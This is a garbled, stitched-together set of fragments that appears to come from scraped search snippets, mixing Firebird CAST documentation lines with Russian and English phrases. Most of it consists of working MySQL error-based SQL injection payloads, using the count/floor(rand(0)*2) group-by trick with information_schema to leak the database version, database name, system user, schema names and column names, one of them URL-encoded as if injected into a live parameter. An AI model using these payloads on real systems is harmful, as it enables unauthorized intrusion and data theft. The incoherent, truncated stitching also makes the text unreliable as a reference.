select cast (2000 as type of quint) from rdb$database select cast (2000 as int) from rdb$database.
...(select count(*),concat((select (select (select distinct concat(version(),0x27,0x7e) limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x
select cast (2000 as type of quint) from rdb$database select cast (2000 as int) from rdb$database. If TYPE OF is used with a (VAR)CHAR type, its character. Casting BLOBs: Successful casting to and from BLOBs is possible since Firebird 2.1.
So_buy+and%28SELECT+1+from%28SELECT+count(*),concat((select+%28SELECT+concat%280X7E%2C0X27%2CDATABASE(),0X27%2C0X7E))+from+
...(select (select distinct concat(0x7e,0x27,unhex(Hex(cast(schema_name as char))),0x27,0x7e) from `information_schema`.schemata limit 1,1)) from `information_schema`.tables limit 0,1)
1' and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,Hex(cast(system_user() as char)),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1. Имя хоста
and (select 1 from (select count(*),concat((select(select concat(cast(column_name as char),0x7e)) from information_schema.columns where table_name=0x726174696e6773 limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a).
It returns a hexadecimal value of 4100: SELECT CAST(CAST(0x41 AS nvarchar) AS varbinary).
and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,cast(version() as char),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1. Now trying this syntax in our site.
...когда в уязвимый параметр передается выражение, начинающееся с «UNION ALL SELECT».